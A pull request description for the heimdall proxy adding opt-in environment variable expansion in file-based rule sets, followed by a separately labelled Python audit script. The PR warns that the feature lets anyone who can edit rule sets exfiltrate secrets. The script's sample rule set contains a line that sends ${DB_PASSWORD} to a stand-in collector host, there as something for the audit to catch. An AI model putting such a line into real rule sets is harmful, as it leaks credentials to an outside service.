feat: Support of env variables in rule sets loaded by the file_system provider using Bash syntax
#775
Related issue(s)
closes #777
Checklist
Description
This PR enables access to environment variables from rule sets using Bash syntax (the same way as is already possible in the static configuration file) loaded by the file_system provider. By default this feature is disabled and, if required, is enabled by making use of the new env_vars_enabled property, e.g. as shown below.

WARNING: All environment variables used in the rule set files must be known in advance to the heimdall process (when it starts). In addition, the usage of that functionality might lead to security issues. If an adversary is somehow able to add new or update existing rule sets, they would theoretically be able to exfiltrate environment variables available to the heimdall process by crafting contextualizers or authorizers which would forward the corresponding values to a controlled service. So, use with caution, disable the watching of rule set updates and try to avoid!
Usage example in a rule set:
Here, the rule with the id rule:1 defines the host to be used for request forwarding using the UPSTREAM_HOST environment variable. If this variable is not set or is empty, the value default-backend:8080 is used instead.
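A pre-deployment check for the risk named in the warning above, as an added example that is not part of this PR or of heimdall: it scans rule set text for Bash-style references and reports any variable outside an allowlist, or one that is unset and has no default. The sample rule set and its keys, the allowlist and every variable name other than UPSTREAM_HOST are constructed, and the operator forms handled (`:-`, `:=`, `-`, `=`) are an assumption about what "Bash syntax" covers here.

```python
import os
import re

# ${NAME} or ${NAME<op>default}; op is one of :- := - =
# (assumed coverage: the PR text only says "Bash syntax").
REF = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*)(?:(:?[-=])([^}]*))?\}")


def find_refs(text):
    """Return (line_no, name, default_or_None) for each reference in text."""
    refs = []
    for no, line in enumerate(text.splitlines(), start=1):
        for m in REF.finditer(line):
            default = m.group(3) if m.group(2) else None
            refs.append((no, m.group(1), default))
    return refs


def audit(text, allowed, env):
    """Flag references that are not allowlisted, or unset with no default.

    An empty value is treated like an unset one, matching the behaviour
    the PR describes for UPSTREAM_HOST.
    """
    findings = []
    for no, name, default in find_refs(text):
        if name not in allowed:
            findings.append((no, name, "not-allowlisted"))
        elif not env.get(name) and default is None:
            findings.append((no, name, "unset-no-default"))
    return findings


# Constructed sample: the keys are illustrative, not heimdall's schema.
SAMPLE = """\
- id: rule:1
  forward_to: ${UPSTREAM_HOST:-default-backend:8080}
  contextualizer_url: https://collector.example/?k=${DB_PASSWORD}
  audience: ${AUDIENCE}
"""

if __name__ == "__main__":
    # Allowlist is a constructed example of variables rule sets may read.
    for finding in audit(SAMPLE, {"UPSTREAM_HOST", "AUDIENCE"}, os.environ):
        print(finding)
```

Running it against every rule set file before heimdall starts, and failing the deployment on any finding, keeps the set of readable variables explicit.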